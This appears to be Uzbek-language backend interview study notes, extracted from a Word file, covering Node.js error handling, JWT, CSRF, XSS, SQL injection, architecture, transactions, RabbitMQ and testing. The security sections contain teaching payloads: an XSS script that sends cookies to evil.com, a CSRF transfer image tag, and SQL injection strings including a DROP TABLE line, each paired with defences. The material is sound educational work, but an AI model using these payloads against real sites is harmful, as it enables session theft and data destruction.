  process.exit(1); // MAJBURIY! Process holatni bashorat qilib bo'lmaydi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throw new Error('Test xato'); // shu yerda ushlanadi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MUHIM: uncaughtException'dan keyin process.exit(1) QILISH KERAK!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Aks holda process noaniq holatda ishlashda davom etadi.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Production'da: PM2/Cluster avtomatik restart qiladi.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49. unhandledRejection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unhandledRejection — .catch() bilan ushlanmagan Promise reject'lari uchun global handler.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process.on('unhandledRejection', (reason, promise) =&gt; {
  console.error('Ushlanmagan rejection:', reason);
  // Log yozing
  logger.error({ reason, promise });
  process.exit(1); // Node.js 15+ avtomatik qiladi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Misol — ushlanmagan rejection:
async function fetchData() {
  throw new Error('Network error');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fetchData(); // .catch() yo'q — unhandledRejection!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Node.js 15+ dan boshlab unhandledRejection = process crash
// Oldingi versiyalarda faqat warning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To'g'ri yechim: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fetchData().catch(err =&gt; console.error(err));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yoki
await fetchData(); // async kontekstda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50. Production'da error bo'lsa nima qilish kerak?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Production error handling strategiyasi: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Structured logging (Winston/Pino):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logger = require('pino')();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logger.error({ err: error, userId, requestId }, 'Request failed');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Error tracking (Sentry):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Sentry.captureException(error);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Graceful shutdown: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process.on('uncaughtException', async (err) =&gt; {
  logger.fatal(err, 'Uncaught exception');
  await cleanup(); // DB connection yopish
  process.exit(1);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HTTP error response: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app.use((err, req, res, next) =&gt; {
  const statusCode = err.statusCode || 500;
  res.status(statusCode).json({
    error: process.env.NODE_ENV === 'production' 
      ? 'Internal Server Error' 
      : err.message
 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PM2 auto-restart + alert: Crash bo'lsa darhol bildirishnoma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51. Nega process restart qilinadi?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Process restart qilish sabablari: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Memory leak — heapUsed doimiy o'sib borsa, restart "tozalaydi"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uncaughtException — process noaniq holatda qolmasin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unhandledRejection — (Node 15+) avtomatik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Konfiguratsiya yangilanishi — env variable o'zgarsa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Zero-downtime deploy — yangi kod yuklash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PM2 bilan restart strategiyalari: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start app.js --max-memory-restart 300M  // 300MB dan oshsa restart
pm2 start app.js --restart-delay 3000       // 3 soniya kutib restart
pm2 start app.js --max-restarts 10          // 10 martadan ko'p restart bo'lsa to'xtat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Cluster restart (zero-downtime):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reload app  // birin-ketin worker'larni restart qiladi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Sog'lom yondashuv: Restart — yechim emas, vaqtinchalik yordam. Asosiy muammoni hal qiling!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52. JWT qanday ishlaydi?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JWT (JSON Web Token) — ma'lumotlarni xavfsiz uzatish uchun ishlatiluvchi token format.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Tuzilishi (3 qism, "." bilan ajratilgan):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header.payload.signature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eyJhbGciOiJIUzI1NiJ9.eyJ1c2VySWQiOjEyM30.SIGNATURE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Header: { "alg": "HS256", "typ": "JWT"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Payload: { "userId": 123, "exp": 1234567890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Signature: HMAC_SHA256(base64(header) + "." + base64(payload), SECRET)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Qanday ishlaydi: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Login → Server JWT yaratadi → Client saqlaydi → Har requestda yuboradi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Server → Signature tekshiradi → Payload'dan userId oladi → DB ga borilmaydi!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jwt = require('jsonwebtoken');
const token = jwt.sign({ userId: 123 }, process.env.JWT_SECRET, { expiresIn: '15m' });
const decoded = jwt.verify(token, process.env.JWT_SECRET);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53. Access token va Refresh token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Access Token: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Qisqa muddatli (5-15 daqiqa)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API so'rovlar uchun ishlatiladi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Memory yoki localStorage'da saqlanadi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Kompromis bo'lsa — kam zarar (tez eskiradi)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Refresh Token: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Uzoq muddatli (7-30 kun)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Yangi access token olish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HTTP-only cookie'da saqlanadi (XSS dan himoya)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DB'da saqlanadi (revoke qilish uchun)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Jarayon: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Login → access_token (15min) + refresh_token (30day) qaytaradi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API so'rovlarda access_token ishlatiladi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Access token eskirsa → /refresh endpoint'iga refresh_token yuboriladi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Server DB'dan tekshiradi → yangi access_token beradi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Logout → DB'dan refresh_token o'chiriladi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54. Refresh token qayerda saqlanadi?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Eng xavfsiz: HTTP-only cookie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Server tomonida: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res.cookie('refreshToken', token,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httpOnly: true,   // JavaScript o'qiy olmaydi (XSS himoya)
  secure: true,     // Faqat HTTPS
  sameSite: 'strict', // CSRF himoya
  maxAge: 30 * 24 * 60 * 60 * 1000 // 30 kun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Nima uchun HTTP-only cookie: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localStorage: XSS orqali o'qiladi (YOMON)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sessionStorage: Tab yopilsa yo'qoladi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Cookie (httpOnly): JavaScript o'qiy olmaydi (YAXSHI)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Qo'shimcha: Server tomonida DB'da saqlash (BlackList uchun):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Logout yoki xavf sezilsa:
await RefreshToken.delete({ token: refreshToken }); // revoke!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55. JWT xavfsizligi qanday ta'minlanadi?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JWT xavfsizligi uchun qoidalar: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Kuchli secret key (256+ bit):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secret = crypto.randomBytes(64).toString('hex');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Qisqa muddatli access token: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jwt.sign(payload, secret, { expiresIn: '15m' }); // 15 daqiqa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Algoritmni belgilash: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jwt.verify(token, secret, { algorithms: ['HS256'] }); // none algoritmga yo'l bermaslik!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Payload'da maxfiy ma'lumot saqlama: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YOMON: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{ userId: 1, password: 'hash', creditCard: '1234' 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YAXSHI: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{ userId: 1, role: 'user'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HTTPS faqat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6. Refresh token HTTP-only cookie'da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7. Token rotation — har refresh'da yangi refresh token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8. JTI (JWT ID) — bir martalik ishlatish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56. CSRF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CSRF (Cross-Site Request Forgery) — foydalanuvchi nomidan uning bilimisiz so'rov yuborish hujumi.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Qanday ishlaydi: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Foydalanuvchi bank.com'ga kirgan (cookie bor)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Evil.com'ga kiradi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Evil.com: &lt;img src="bank.com/transfer?to=hacker&amp;amount=1000"&gt;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Brauzer cookie'ni avtomatik yuboradi → pul o'tadi!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Himoya usullari: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CSRF Token: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app.use(csrf()); // express-csrf
// Form'da: &lt;input type="hidden" name="_csrf" value="{{ csrfToken }}"&gt;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SameSite Cookie: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res.cookie('session', token, { sameSite: 'strict'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Origin/Referer header tekshirish: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(req.headers.origin !== 'https://mysite.com') return res.status(403);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Custom header (AJAX uchun):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headers: { 'X-Requested-With': 'XMLHttpRequest' }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57. XSS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XSS (Cross-Site Scripting) — boshqa foydalanuvchilar ko'radigan sahifaga yovuz JavaScript kodi kiritish.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Turlari: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Stored XSS: Ma'lumotlar bazasiga saqlanadi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Reflected XSS: URL parametridan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DOM-based XSS: Client-side JavaScript'dan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Foydalanuvchi sharh yozadi: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&lt;script&gt;document.location='evil.com/steal?c='+document.cookie&lt;/script&gt;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Bu saqlansa va ko'rsatilsa — boshqalar cookie'si o'g'irlanadi!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Himoya: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1. Input sanitization
const sanitizeHtml = require('sanitize-html');
const clean = sanitizeHtml(userInput);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2. Output encoding
const escaped = userInput.replace(/&lt;/g, '&amp;lt;').replace(/&gt;/g, '&amp;gt;');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3. Content Security Policy (CSP):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res.setHeader('Content-Security-Policy', "script-src 'self'");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4. HTTP-only cookie (token o'g'irlanmasin)
// 5. Frontend: textContent ishlatish, innerHTML emas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58. SQL Injection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SQL Injection — foydalanuvchi kiritgan ma'lumot orqali SQL query'ni o'zgartirish hujumi.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 (Node.js + MySQL):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YOMON — injection xavfli:
const query = "SELECT * FROM users WHERE email='" + email + "'";
// email = "' OR '1'='1" bo'lsa → barcha foydalanuvchilar!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Yoki: "'; DROP TABLE users; --"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TO'G'RI — Parameterized query:
const [users] = await db.query(
  'SELECT * FROM users WHERE email = ?',
  [email] // avtomatik escape qilinadi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ORM (Sequelize) bilan:
const user = await User.findOne({ where: { email } }); // xavfsiz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Prisma bilan:
const user = await prisma.user.findUnique({ where: { email } }); // xavfsiz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Qoida: Hech qachon string concatenation bilan SQL yozmang!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59. Rate limiting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Rate limiting — ma'lum vaqt ichida bitta foydalanuvchi/IP'dan keluvchi so'rovlar sonini cheklash.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Nima uchun: DDoS, brute force, API suiste'mol oldini olish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express-rate-limit bilan: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rateLimit = require('express-rate-limit');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Umumiy limit
const limiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 daqiqa
  max: 100, // 100 ta so'rov
  message: 'So'rov limiti oshdi, keyinroq urinib ko'ring'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app.use('/api/', limiter);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Login uchun qattiqroq
const loginLimiter = rateLimit({
  windowMs: 60 * 1000,
  max: 5, // 1 daqiqada 5 ta urinish
  skipSuccessfulRequests: true // muvaffaqiyatlilarni sanama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app.post('/login', loginLimiter, loginHandler);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Redis bilan tarqatilgan rate limiting: rate-limiter-flexible paketi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60. Layered architecture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Layered (qatlamli) arxitektura — dasturni vazifalar bo'yicha alohida qatlamlarga bo'lish.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Tipik 3 qatlam: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┌─────────────────┐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│   Controller    │ ← HTTP so'rov/javob, input validation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├─────────────────┤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│    Service      │ ← Biznes logika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├─────────────────┤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│   Repository    │ ← Ma'lumotlar bazasi operatsiyalari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userController.js
async createUser(req, res) {
  const dto = req.body;
  const user = await userService.create(dto);
  res.json(user);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userService.js
async create(dto) {
  await this.validate(dto);
  const hashed = await bcrypt.hash(dto.password, 10);
  return userRepository.create({ ...dto, password: hashed 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userRepository.js
async create(data) {
  return User.create(data); // DB operatsiya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Afzalligi: Har qatlam alohida test qilinadi, almashtirish oson.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61. Controller, Service, Repository vazifalari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Controller vazifasi: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HTTP so'rovni qabul qilish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Input validatsiyasi (DTO)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Service'ni chaqirish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HTTP javob qaytarish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Faqat transport layer logikasi (HTTP kodi, header)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Service vazifasi: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Biznes qoidalari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Hisob-kitoblar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Bir nechta repository'ni birlashtirish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Transaction boshqaruvi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Tashqi servislar (email, SMS)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Repository vazifasi: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Faqat DB operatsiyalari (CRUD)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Query'lar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DB'ga xos kodlar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Abstraktsiya (MySQL → PostgreSQL o'zgartirish oson bo'lsin)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Qoida: Service'da HTTP bilmaydi, Controller'da SQL bilmaydi!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62. SOLID prinsiplari qaysilar?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 — Single Responsibility: Har class faqat bitta vazifa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Yomon: UserService (login + email + payment)
// Yaxshi: UserService, EmailService, PaymentService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O — Open/Closed: Kengaytirish uchun ochiq, o'zgartirish uchun yopiq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if/else qo'shish o'rniga — strategy pattern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 — Liskov Substitution: Subclass ota-classni almashtira olishi kerak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Duck to'r o'qmaydi — bu Liskov buzilishi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 — Interface Segregation: Katta interface o'rniga kichik interfacelar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IAnimal { swim(), fly(), run() } — yomon
// ISwimmable, IFlyable, IRunnble — yaxshi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 — Dependency Inversion: Abstraksiyaga bog'lan, implementatsiyaga emas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Yomon: new MySQLRepository()
// Yaxshi: constructor(private repo: IUserRepository)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63. Dependency Injection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Dependency Injection (DI) — ob'ektga kerakli bog'liqliklarni (dependencies) ichidan yaratish o'rniga tashqaridan berish.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YOMON — tight coupling:
class UserService {
  private repo = new UserRepository(); // ichida yaratildi!
  private email = new EmailService();  // almashtirish qiyin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YAXSHI — DI:
class UserService {
  constructor(
    private repo: UserRepository,    // tashqaridan berildi
    private email: EmailService
  ) {}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Ishlatish:
const repo = new UserRepository(db);
const email = new EmailService(config);
const userService = new UserService(repo, email);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NestJS DI (avtomatik):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@Injectable()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UserService {
  constructor(private userRepository: UserRepository) {}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Afzalligi: Unit test uchun mock berish oson, modullar almashtirish oson.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64. Monolith va Microservices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Monolith — barcha kod bitta dastur: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+ Oddiy deploy, debug, test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+ Kichik jamoalar uchun yaxshi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+ Network latency yo'q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Katta bo'lgach sekinlashadi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Bitta xato hamma xizmatni to'xtatadi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Teknologiyani almashtirish qiyin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Microservices — har xizmat alohida dastur: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+ Har xizmat alohida scale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+ Har xizmat alohida deploy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+ Texnologiya tanlash erkinligi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Murakkab infratuzilma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Network latency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Distributed transaction qiyin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Kichik jamoalar uchun ortiqcha murakkablik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Maslahat: Avval Monolith, kerak bo'lganda Microservice'ga o'ting.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"Don't start with Microservices" — Martin Fowler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65. CQRS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CQRS (Command Query Responsibility Segregation) — o'qish (Query) va yozish (Command) operatsiyalarini ajratish pattern'i.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Oddiy arxitektura: Bir model ham o'qiydi ham yozadi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CQRS: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Command (yozish) → Write DB (PostgreSQL, normalized)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Query (o'qish)   → Read DB (Redis, denormalized, tez)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Command side:
class CreateOrderCommand {
  handle(dto) {
    // Validatsiya, biznes qoidalar
    return orderRepository.create(dto); // Write DB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Query side:
class GetOrdersQuery {
  handle(userId) {
    return readCache.get(userId); // Redis — tez o'qish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kerak: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O'qish va yozish nisbati katta farq qilganda (90% o'qish, 10% yozish)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Performance muhim bo'lganda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Murakkab biznes qoidalar bo'lganda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66. Transaction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Transaction — bir guruh operatsiyalar yoki hammasi muvaffaqiyatli bajariladi, yoki hech biri bajarilmaydi (ACID).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Misol: Bank o'tkazma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Ali hisobidan 100$ ayirish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Vali hisobiga 100$ qo'shish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→ Agar 2-qadam muvaffaqiyatsiz bo'lsa — 1-qadam ham bekor!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Sequelize transaction:
const t = await sequelize.transaction();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try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Account.decrement('balance', { by: 100, where: { id: aliId }, transaction: t });
  await Account.increment('balance', { by: 100, where: { id: valiId }, transaction: t });
  await t.commit(); // hammasi muvaffaqiyatli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 catch (err)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t.rollback(); // hamma o'zgarishlarni bekor qil
  throw err;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Prisma:
await prisma.$transaction([
  prisma.account.update({ ... }),
  prisma.account.update({ ... })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]);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67. ACID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ACID — database transaction'larining 4 ta xususiyati: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 — Atomicity (Atomlik): Ya hammasi, ya hech nima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Transaction ichidagi operatsiyalar yoki barchasi bajariladi, yoki hech biri.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 — Consistency (Izchillik): Ma'lumotlar har doim valid holatda bo'ladi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Balans manfiy bo'la olmaydi, unique field takrorlanmaydi.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 — Isolation (Izolyatsiya): Parallel transactionlar bir-biriga ta'sir qilmaydi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 transaction boshqasining "yarim bajarilgan" ma'lumotini ko'rmaydi.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 — Durability (Mustahkamlik): Commit qilingan ma'lumot saqlanib qoladi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Server o'chib ketsa ham — committed transaction yo'qolmaydi.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PostgreSQL, MySQL — to'liq ACID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MongoDB (4.0+) — Multi-document transaction bor, lekin ba'zi holatlar boshqacha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Redis — by default ACID emas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68. Isolation levels qaysilar?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 ta isolation level (past → yuqori):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READ UNCOMMITTED — Eng past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Boshqa transaction'ning commit qilinmagan ma'lumotini o'qiy oladi (Dirty Read)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READ COMMITTED — Default (PostgreSQL)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Faqat commit qilingan ma'lumotni o'qiydi. Dirty Read yo'q.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Non-repeatable Read mumkin (bir transaction ichida ikki marta o'qisa — har xil natija)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REPEATABLE READ — Default (MySQL InnoDB)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 transaction ichida bir xil natija. Non-repeatable Read yo'q.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Phantom Read mumkin (yangi qatorlar paydo bo'lishi)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SERIALIZABLE — Eng yuqori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Phantom Read yo'q. Transaction'lar ketma-ket kabi ishlaydi.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Eng sekin!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TRANSACTION ISOLATION LEVEL SERIALIZABLE;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69. READ COMMITTED va SERIALIZABLE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READ COMMITTED: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Faqat commit qilingan ma'lumotni ko'radi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Tez (kam lock)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Non-repeatable read mumkin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Ko'pchilik web app uchun yetarli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T1: o'qiydi (saldo=100)
-- T2: 50 ayiradi, commit qiladi
-- T1: qayta o'qiydi (saldo=50) ← farqli natija!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SERIALIZABLE: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Hech qanday anomaliya yo'q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Sust (ko'p lock yoki MVCC)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Moliyaviy hisob-kitoblar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SERIALIZABLE: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Bank: bir vaqtda ikki joydan pul olish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Ticket booking: oxirgi o'rindiqni ikki kishi sotib olmasin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Inventory: stokni manfiyga chiqarmaslik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70. Deadlock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Deadlock — ikki yoki ko'proq transaction bir-birining lockini kutib qolganda, hech biri davom eta olmaydi.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Transaction 1:          -- Transaction 2:
LOCK TABLE A               LOCK TABLE B
-- A lock qilindi          -- B lock qilindi
LOCK TABLE B ← kutadi      LOCK TABLE A ← kutadi
-- B ni T2 kutmoqda        -- A ni T1 kutmoqda
-- DEADLOCK!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 da oldini olish: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1. Har doim bir xil tartibda lock olish
// T1 ham T2 ham: avval A, keyin B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2. Transaction vaqtini cheklash
await db.query('SET innodb_lock_wait_timeout = 5'); // 5 soniya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3. Retry logika:
async function withRetry(fn, retries = 3) {
  for (let i = 0; i &lt; retries; i++) {
    try {
      return await fn();
    } catch (err) {
      if (err.code !== 'ER_LOCK_DEADLOCK' || i === retries - 1) throw err;
      await new Promise(r =&gt; setTimeout(r, 100 * i));
    }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71. N+1 problem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N+1 problem — 1 ta asosiy query + N ta alohida query natijasida paydo bo'ladigan performance muammosi.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 (N+1):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posts = await Post.findAll(); // 1 ta query — 100 ta post
for (const post of posts) {
  const author = await User.findByPk(post.userId); // 100 ta query!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Jami: 1 + 100 = 101 ta query!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Nima muammo: 100 ta alohida DB so'rovi — har biri network latency + parse vaqti.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Sequelize'da log qilib tekshirish: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sequelize = new Sequelize({
  logging: (sql) =&gt; console.log(sql) // har queryni ko'rish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72. N+1 problem qanday hal qilinadi?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Eager Loading (JOIN):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Sequelize:
const posts = await Post.findAll({
  include: [{ model: User, as: 'author' }] // 1 ta JOIN query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Jami: 1 ta query!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Prisma:
const posts = await prisma.post.findMany({
  include: { author: true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DataLoader (GraphQL uchun):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DataLoader = require('dataloader');
const userLoader = new DataLoader(async (ids) =&gt; {
  const users = await User.findAll({ where: { id: ids } });
  return ids.map(id =&gt; users.find(u =&gt; u.id === id));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Bir batch'da barcha userlarni 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Raw SQL JOIN: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posts.*, users.name FROM posts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JOIN users ON posts.userId = users.id;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Natija: 101 query → 1 query!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73. RabbitMQ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RabbitMQ — AMQP protokolida ishlovchi open-source message broker. Dasturlar orasida xabarlarni uzatish uchun ishlatiladi.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Asosiy konsepsiya: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Producer → Exchange → Queue → Consumer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Producer: Xabar yuboruvchi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Exchange: Xabarlarni tarqatuvchi (routing)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Queue: Xabarlar ombori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Consumer: Xabar qabul qiluvchi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amqp = require('amqplib');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Producer:
const conn = await amqp.connect('amqp://localhost');
const ch = await conn.createChannel();
await ch.assertQueue('tasks');
ch.sendToQueue('tasks', Buffer.from(JSON.stringify({ job: 'send-email', to: 'a@b.com' })));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Consumer:
const conn = await amqp.connect('amqp://localhost');
const ch = await conn.createChannel();
ch.consume('tasks', (msg) =&gt; {
  const task = JSON.parse(msg.content.toString());
  processTask(task);
  ch.ack(msg); // bajarildi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74. RabbitMQ asosiy vazifasi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RabbitMQ asosiy vazifalari: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Asinxron processing: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HTTP request → Queue → Fon'da ishlash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(Email yuborish, PDF yaratish, bildirishnoma)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Decoupling (ajratish):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Order Service → Queue → Email Service (bir-birini bilmaydi!)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Load balancing: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Ko'p consumer bir queue'dan ishlasa — avtomatik taqsimlash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Reliability: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Consumer o'lib qolsa — xabar queue'da qoladi, restart'dan keyin qayta olinadi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Rate limiting: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Tez kelayotgan xabarlarni sekin consumer ishlay oladi (buffer)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 scenario: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Foydalanuvchi ro'yxatdan o'tadi →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→ Queue'ga: {type: 'new-user', email: '...'}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→ Email service: xush kelibsiz email yuboradi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→ Analytics service: statistika yangilaydi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→ Notification service: admin'ga xabar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75. Producer, Exchange, Queue, Consumer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Producer — xabar yuboruvchi dastur/service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Exchange — xabarlarni qabul qilib, qoidalarga asosan queue'larga yo'naltiruvchi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Queue — xabarlar ombori (doimiy yoki vaqtinchalik)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Consumer — queue'dan xabar olib ishlovchi dastur/service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Producer → [Exchange] → [Queue] → Consumer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Producer faqat Exchange'ga yuboradi, qaysi Queue'ga borishini bilmaydi!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Exchange routing key va binding'ga asosan yo'naltiradi.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Binding — Exchange va Queue'ni bog'lovchi qoida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Exchange yaratish:
ch.assertExchange('orders', 'direct');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Queue'ni Exchange'ga bog'lash:
ch.assertQueue('email-queue');
ch.bindQueue('email-queue', 'orders', 'email'); // routing key = 'email'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Producer:
ch.publish('orders', 'email', Buffer.from(data)); // 'email' routing key bilan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76. Exchange turlari qaysilar?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 ta asosiy exchange turi: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Direct — routing key'ga mos queue'ga yuboradi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ch.publish('exchange', 'routing-key', msg);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Ishlatish: Aniq bir service'ga yuborish (email, sms)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Fanout — barcha bog'liq queue'larga yuboradi (broadcast)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ch.publish('logs', '', msg); // routing key e'tiborga olinmaydi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Ishlatish: Event broadcasting (user.created → email + analytics + notification)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Topic — pattern matching (wildcards)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'user.*' → user.created, user.deleted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'#.error' → app.server.error, db.error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Ishlatish: Log aggregation, flexible routing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Headers — header atributlariga asosan routing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{ x-match: 'all', format: 'pdf', type: 'report'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Ishlatish: Murakkab routing qoidalari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77. Ack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Ack (Acknowledgment) — consumer xabarni muvaffaqiyatli qayta ishladi degan tasdiq signali.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Nima uchun muhim: Ack bo'lmaguncha RabbitMQ xabarni queue'dan o'chirmaydi!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Manual Ack:
ch.consume('queue', async (msg) =&gt; {
  try {
    await processTask(JSON.parse(msg.content.toString()));
    ch.ack(msg); // muvaffaqiyatli — o'chir
  } catch (err) {
    ch.nack(msg, false, true); // xato — queue'ga qaytaruvchi (requeue: true)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Nack + dead letter:
ch.nack(msg, false, false); // queue'ga qaytarma → DLQ ga boradi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Auto Ack (xavfli):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ch.consume('queue', handler, { noAck: true }); // Consumer o'lsa xabar yo'qoladi!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Production'da: Har doim manual ack ishlatish kerak!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78. Prefetch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Prefetch — bir consumer bir vaqtda nechta xabar olishi mumkinligini cheklash.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Muammo: Prefetch yo'q bo'lsa — consumer barcha xabarlarni bitta oladi va sekin ishlab, boshqa consumer'larga qoldirmaydi.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Prefetch qo'yish:
ch.prefetch(1); // Bir vaqtda faqat 1 ta xabar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Yoki kanal darajasida:
ch.prefetch(10, true); // Kanal bo'yicha 10 ta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Misol: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 ta consumer, prefetch=1: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C1: xabar 1 ni oldi (ishlayapti)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C2: xabar 2 ni oldi (ishlayapti)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C3: xabar 3 ni oldi (ishlayapti)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= Baravar taqsimlash!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prefetch=10 bo'lsa — har consumer 10 tadan olib, qolganlar ovqatsiz qoladi.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Maslahat: prefetch=1 oddiy holatda, katta throughput uchun oshiring.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79. Durable queue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Durable queue — RabbitMQ server restart bo'lganda ham saqlanib qoladigan queue.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Durable queue yaratish:
await ch.assertQueue('tasks', {
  durable: true // server restart'dan omon qoladi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Persistent xabar (queue durable + message persistent):
ch.sendToQueue('tasks', Buffer.from(data), {
  persistent: true // disk'ga yoziladi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Farq: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durable: false → server restart'da queue yo'qoladi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durable: true → queue saqlanadi, lekin xabarlar yo'qolishi mumkin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persistent: true → xabarlar disk'ga yoziladi (sekinroq, lekin xavfsiz)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Production'da: Har doim durable: true + persistent: true ishlatish kerak!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Afzalligi: RabbitMQ yoki server crash bo'lsa — xabarlar yo'qolmaydi.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80. Dead Letter Queue (DLQ)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DLQ — qayta ishlash mumkin bo'lmagan, xato bo'lgan xabarlar uchun alohida queue.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xabar DLQ ga tushadi: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nack bilan reject qilinganda (requeue: false)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TTL (Time To Live) o'tganda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Queue to'lib ketganda (max-length oshganda)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DLQ sozlash:
await ch.assertExchange('dlx', 'direct'); // Dead Letter Exchange
await ch.assertQueue('dlq'); // Dead Letter Queue
await ch.bindQueue('dlq', 'dlx', 'dead');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ch.assertQueue('main-queue', {
  durable: true,
  arguments: {
    'x-dead-letter-exchange': 'dlx',
    'x-dead-letter-routing-key': 'dead',
    'x-message-ttl': 30000 // 30 soniyada DLQ ga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Foydalanish: DLQ'dagi xabarlarni monitoring → manual qayta ishlash → xato sababini tushunish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81. RabbitMQ qachon ishlatiladi?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RabbitMQ ishlatish holatlari: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Asinxron task queue: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Email/SMS yuborish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PDF/report yaratish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Image resize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Fon'da data processing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Microservices muloqoti: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Order service → Payment service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User service → Notification service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Event-driven arxitektura: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user.registered → (email, analytics, crm)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order.created → (warehouse, billing, notification)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Retry mexanizmi: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Xato bo'lgan operatsiyalarni qayta urinish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Load leveling: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Peak vaqtda kelgan requestlarni sekin ishlash (spike handling)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RabbitMQ KERAK EMAS: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Bitta server, oddiy task'lar uchun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Real-time chat (WebSocket yaxshiroq)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Katta data stream (Kafka yaxshiroq)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82. RabbitMQ va Kafka farqi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RabbitMQ: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Message broker (xabar vositachi)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Xabarlar iste'mol qilingach o'chadi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Murakkab routing (exchange, binding)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Small-medium throughput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Task queue, RPC uchun ideal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Qisqa muddatli xabarlar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Kafka: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Distributed log / Event streaming platform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Xabarlar saqlanib qoladi (retention period)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Yuqori throughput (millions/sec)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Consumer group (bir xabarni bir nechta service o'qiy oladi)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Event sourcing, audit log uchun ideal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Big data, real-time analytics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RabbitMQ: Task queue, microservice muloqoti, retry logika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Qachon Kafka: Event streaming, audit log, real-time analytics, billions of events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Oddiy qoida: RabbitMQ = Pochta kutisi, Kafka = Jurnal (log kitob)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83. Unit test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Unit test — kodning eng kichik qismi (funksiya, metod, klass) ni izolyatsiyada test qilish.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"Izolyatsiya" = tashqi bog'liqliklar (DB, API) Mock qilinadi.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userService.test.js (Jest):
const userService = require('./userService');
const userRepo = require('./userRepository');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jest.mock('./userRepository'); // DB mock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test('createUser parol hash qilishi kerak', async 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userRepo.create.mockResolvedValue({ id: 1, email: 'test@test.com' });
  const user = await userService.create({
    email: 'test@test.com',
    password: 'plain123'
  });
  expect(userRepo.create).toHaveBeenCalledWith(
    expect.objectContaining({
      password: expect.not.stringContaining('plain123') // hash bo'lgan
    })
  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Tez, izolyatsiyalangan, bir funksiyani tekshiradi.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84. Integration test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Integration test — bir nechta komponentlar birgalikda to'g'ri ishlashini tekshiradi. Haqiqiy DB, HTTP ishlatilishi mumkin.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Haqiqiy DB bilan:
const request = require('supertest');
const app = require('./app');
const db = require('./db');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beforeAll(async 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db.migrate(); // test DB yaratish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afterAll(async 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db.destroy();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test('POST /users yangi foydalanuvchi yaratishi kerak', async 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res = await request(app)
    .post('/users')
    .send({ email: 'test@test.com', password: '12345678' });
  expect(res.status).toBe(201);
  expect(res.body.email).toBe('test@test.com');
  // DB'da ham tekshirish:
  const user = await User.findOne({ where: { email: 'test@test.com' } });
  expect(user).toBeTruthy();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Unit test'dan sekin, lekin haqiqiyroq.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85. E2E test nima?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E2E (End-to-End) test — foydalanuvchi ko'zidan butun tizimni boshidan oxirigacha test qilish. Haqiqiy brauzer, haqiqiy server.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Playwright bilan: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test, expect } = require('@playwright/test');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test('foydalanuvchi kirishi va dashboard ko'rishi', async ({ page })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page.goto('http://localhost:3000/login');
  await page.fill('#email', 'user@test.com');
  await page.fill('#password', 'password123');
  await page.click('button[type=submit]');
  await expect(page).toHaveURL('/dashboard');
  await expect(page.locator('h1')).toContainText('Xush kelibsiz');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Test piramidasi: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Unit tests: 70% (tez, arzon, ko'p)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Integration tests: 20% (o'rtacha)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E2E tests: 10% (sekin, qimmat, oz)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86. Node.js nega CPU heavy task uchun yomon?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Sabab: Node.js single-thread — CPU heavy task butun Event Loop'ni bloklaydi.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Tasavvur qiling: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Restaurant'da 1 ta ofitsiant (Node.js):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Mijoz buyurtma beradi → Oshpazga beradi (async I/O, ofitsiant bo'sh)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Hamma buyurtmalarni boshqaradi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LEKIN: ofitsiant o'zi pishira boshlasa → boshqa mijozlar kutadi!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CPU heavy:
app.get('/fibonacci', (req, res) =&gt; {
  const result = fibonacci(45); // ~8 soniya
  // Bu 8 soniyada boshqa HAMMA requestlar KUTADI!
  res.send(result.toString());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Go, Rust, Java'da: Har request alohida thread → parallel ishlaydi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Node.js I/O uchun zo'r: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API server (DB query, HTTP call) → Node.js ✅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File server, proxy → Node.js ✅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Video encoding, ML inference → Node.js ❌ (Worker Threads yoki boshqa tilda)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87. Promise ichida setTimeout bo'lsa qaysi biri birinchi ishlaydi?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Promise.then (microtask) setTimeout'dan (macrotask) OLDIN ishlaydi.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promise = new Promise((resolve) =&gt; {
  setTimeout(() =&gt; {
    console.log('2 - setTimeout inside Promise');
    resolve('done');
  }, 0);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promise.then(() =&gt; {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console.log('3 - Promise.then');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console.log('1 - Sync');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setTimeout(() =&gt; console.log('4 - Outer setTimeout'), 0);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Natija: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1 - Sync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2 - setTimeout inside Promise  (setTimeout callback bajarildi, resolve chaqirildi)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3 - Promise.then  (resolve chaqirildi → microtask queue'ga → darhol)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4 - Outer setTimeout  (keyingi macrotask)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Izoh: setTimeout callback bajarilganda resolve() chaqiriladi → shu daqiqada .then microtask queue'ga tushadi → setTimeout tugagach, darhol .then ishga tushadi.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88. process.nextTick noto'g'ri ishlatilsa nima bo'ladi?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Muammo: Recursive nextTick I/O "starvation" qiladi.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XAVFLI:
function infinite() {
  process.nextTick(infinite);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infinite();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I/O hech qachon ishlamaydi!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fs.readFile('file.txt', () =&gt; console.log('Bu hech qachon chiqmaydi!'));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Nima bo'ladi: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nextTick queue hech qachon bo'shmaydi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Event Loop Poll fazasiga hech qachon yetmaydi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- Timer'lar ishlaydi? Yo'q! Ular ham kutadi.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To'g'ri ishlatish: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Callback'ni asinxron qilish
function readData(callback) {
  if (cache) {
    process.nextTick(() =&gt; callback(null, cache)); // "asinxron" callback
  } else {
    fs.readFile('data.txt', callback);
  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❌ Hech qachon recursive nextTick
// ✅ setImmediate ishlatish — har iteratsiyada faqat bir marta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89. Production'da console.log muammo bo'ladimi?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Ha, bir necha muammo bor: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Sinxron I/O (bloklashi mumkin):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Node.js'da console.log sinxron stdout'ga yozadi
// Yuqori load'da bu sekinlashishga olib keladi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Structured logging yo'q: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console.log('Xato:', err); // qidirib bo'lmaydi, filter yo'q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Log darajasi yo'q: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debug, info, warn, error farq qilmaydi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Performance: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Katta ob'ektlarni log qilish JSON.stringify chaqiradi → sekin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Production uchun yechim — Pino yoki Winston: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pino = require('pino');
const logger = pino({
  level: process.env.LOG_LEVEL || 'info'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logger.info({ userId: 123, action: 'login' }, 'Foydalanuvchi kirdi');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logger.error({ err: error, requestId }, 'Request muvaffaqiyatsiz');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Pino afzalliklari:
// - Juda tez (console.log dan 5x tez)
// - JSON format (ELK, Datadog bilan mos)
// - Log level filterlash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4A90D9" w:sz="2" w:space="2"/>
        </w:pBdr>
        <w:shd w:fill="E8F0FB" w:val="clear"/>
        <w:spacing w:after="100" w:before="320"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
